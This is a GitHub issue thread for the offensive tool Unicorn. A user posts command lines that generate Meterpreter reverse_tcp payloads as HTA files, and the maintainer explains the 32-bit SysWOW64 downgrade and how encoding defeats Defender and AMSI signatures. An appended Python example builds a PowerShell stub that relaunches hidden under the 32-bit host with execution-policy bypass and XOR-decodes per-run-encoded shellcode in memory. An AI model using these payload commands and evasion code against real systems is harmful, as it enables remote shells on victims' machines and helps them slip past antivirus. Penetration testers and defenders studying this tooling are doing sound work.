trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. Based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com

64 bit metasploit payloads not generating for some reason #100

Status: Closed (confuciussayuhm closed this issue 5 years ago)

confuciussayuhm commented 5 years ago

Hello there,

I am able to use unicorn.py to generate 32-bit Metasploit payloads:

    python unicorn.py windows/meterpreter/reverse_tcp 0.0.0.0 444 hta

However, when I try using unicorn.py to generate a 64-bit Metasploit payload:

    python unicorn.py windows/x64/meterpreter/reverse_tcp 0.0.0.0 444 hta
    [*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
    [!] Shellcode was not generated for some reason. Check payload name and if Metasploit is working and try again. Exiting....

My OS:

    cat /etc/*release*
    DISTRIB_ID=Kali
    DISTRIB_RELEASE=kali-rolling
    DISTRIB_CODENAME=kali-rolling
    DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling"
    PRETTY_NAME="Kali GNU/Linux Rolling"
    NAME="Kali GNU/Linux"
    ID=kali
    VERSION="2019.1"
    VERSION_ID="2019.1"
    ID_LIKE=debian
    ANSI_COLOR="1;31"
    HOME_URL="https://www.kali.org/"
    SUPPORT_URL="https://forums.kali.org/"
    BUG_REPORT_URL="https://bugs.kali.org/"

trustedsec commented 5 years ago

You would not use a 64-bit payload in Unicorn; it's designed for downgrades to a 32-bit process through SysWOW64 on 64-bit systems. This allows native 32-bit shellcode to be used on both 32-bit systems and 64-bit systems.

confuciussayuhm commented 5 years ago

Ah! Makes sense now! There is a problem, though, with this 32-bit downgrade. The current bypasses for AMSI on Windows 10 can only patch the 64-bit amsi.dll from a 64-bit process. This means that no matter how hard a user of Unicorn tries to execute post-exploitation PowerShell scripts, they will be blocked by AMSI on Windows 10. For more information about this, check out Rasta_Mouse's blog post: https://rastamouse.me/2018/12/amsiscanbuffer-bypass-part-4/

trustedsec commented 5 years ago

The problem with the AMSI bypass techniques is that as soon as they are published, a signature is released in order to identify it through Defender. Defender will scan, then send to AMSI, then scan again. I do have AMSI_BYPASS already built in; you need to edit unicorn.py and turn AMSI_BYPASS on, however it gets flagged by Defender. Unicorn in its current state doesn't need to worry about AMSI because it encodes the shellcode so that static signatures can't identify it. If you look at the decoded form, the shellcode is all mangled and unique every time. There's no need to bypass AMSI, as AMSI is still static signatures, just in a clearer form to Defender as the AMSI provider.
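The two points made in the maintainer's replies above (the SysWOW64 downgrade so that 32-bit shellcode runs on both architectures, and per-run encoding of the shellcode so that a static signature on the raw bytes does not match the stored form) can be shown together in a small generator. This is an added example written for this page, not Unicorn's own code or the way Unicorn builds its payloads: the XOR scheme, the `build_downgrade_stub` function, the use of `-File` with `$MyInvocation.MyCommand.Path` for the relaunch, and the sample byte string are all assumptions made here for illustration. The emitted PowerShell stops once the bytes are decoded in the 32-bit process; it does not allocate or execute anything.

```python
import secrets
from typing import Optional, Tuple

# Constructed placeholder bytes (three NOPs and an INT3), NOT real shellcode.
SAMPLE_SHELLCODE = b"\x90\x90\x90\xcc"

# Assumed location of the 32-bit PowerShell host on a 64-bit Windows install.
SYSWOW64_POWERSHELL = r"$env:windir\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"


def xor_encode(shellcode: bytes, key: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """XOR the shellcode with a key; a fresh random key is drawn when none is given,
    so every generated payload stores different bytes for the same shellcode."""
    if key is None:
        key = secrets.token_bytes(16)
    if not key:
        raise ValueError("key must not be empty")
    encoded = bytes(b ^ key[i % len(key)] for i, b in enumerate(shellcode))
    return encoded, key


def xor_decode(encoded: bytes, key: bytes) -> bytes:
    """Inverse of xor_encode (same operation, same key)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(encoded))


def matches_static_signature(blob: bytes, signature: bytes) -> bool:
    """Model of a static byte-pattern check: true if the pattern occurs verbatim."""
    return signature in blob


def _ps_byte_array(data: bytes) -> str:
    """Render bytes as a PowerShell [byte[]] literal, e.g. 0x90,0xcc."""
    return ",".join(f"0x{b:02x}" for b in data)


def build_downgrade_stub(encoded: bytes, key: bytes) -> str:
    """Emit a PowerShell script that (1) relaunches itself under the 32-bit host
    when it finds itself in a 64-bit process and (2) decodes the bytes in memory.
    The relaunch and decode logic here is an assumed illustration, not Unicorn's."""
    return "\n".join(
        [
            # [IntPtr]::Size is 8 only inside a 64-bit process.
            "if ([IntPtr]::Size -eq 8) {",
            f'    $ps32 = "{SYSWOW64_POWERSHELL}"',
            "    Start-Process -FilePath $ps32 -WindowStyle Hidden -ArgumentList @(",
            "        '-NoProfile', '-ExecutionPolicy', 'Bypass',",
            "        '-File', $MyInvocation.MyCommand.Path)",
            "    exit",
            "}",
            # Stored form: encoded bytes plus the key, both unique per generation.
            f"[byte[]]$enc = {_ps_byte_array(encoded)}",
            f"[byte[]]$key = {_ps_byte_array(key)}",
            "[byte[]]$sc = New-Object byte[] $enc.Length",
            "for ($i = 0; $i -lt $enc.Length; $i++) {",
            "    $sc[$i] = $enc[$i] -bxor $key[$i % $key.Length]",
            "}",
            "# $sc now holds the decoded bytes inside a 32-bit process; nothing is executed here.",
        ]
    )


if __name__ == "__main__":
    enc, key = xor_encode(SAMPLE_SHELLCODE)
    assert xor_decode(enc, key) == SAMPLE_SHELLCODE
    print(build_downgrade_stub(enc, key))
```

Running the block twice prints two stubs whose `$enc` and `$key` lines differ while decoding to the same bytes, which is the "unique every time" property the reply describes; a pattern that matches the raw sample bytes does not match the encoded array, but note that this only defeats a signature written against the stored bytes, not inspection of what the process holds after the decode loop runs.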